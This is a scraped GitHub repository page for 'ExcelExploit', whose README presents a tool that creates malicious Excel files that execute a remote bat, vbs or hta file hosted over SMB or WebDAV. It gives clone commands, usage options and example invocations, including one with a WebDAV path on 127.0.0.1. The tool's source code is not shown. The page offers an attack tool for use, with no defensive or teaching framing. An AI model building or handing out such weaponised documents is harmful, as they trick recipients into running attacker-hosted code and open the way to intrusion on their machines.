Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

TukoG/ExcelExploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

4 Commits

Repository files navigation


Excel Exploit



Create a malicious excel file that runs a remote file hosted via SMB or WebDAV

git clone https://github.com/TukoG/ExcelExploit
cd ExcelExploit

Usage

usage: main.py [-h] [--protocol exploit_file] [--output OUTPUT]
options:
 -h, --help show this help message and exit
 --protocol exploit_file, -p exploit_file
 file to execute (bat,vbs,hta) 
 --output OUTPUT, -o OUTPUT
 output mal xlsx file (default: ./exloit.xlsx)
python3 main.py -h 
python main.py -p "file:///C:\test\test.vbs"
python main.py -p "file:///C:\test\test.vbs" -o mal.xlsx
python main.py -p "file:///\127円.0.0.1@8000/DavWWWRoot/test.vbs"

About

Create Excel files that run a remote files hosted via SMB , WebDAV ...

Topics

Resources

License

Stars

Watchers

Forks

Languages

AltStyle によって変換されたページ (->オリジナル) /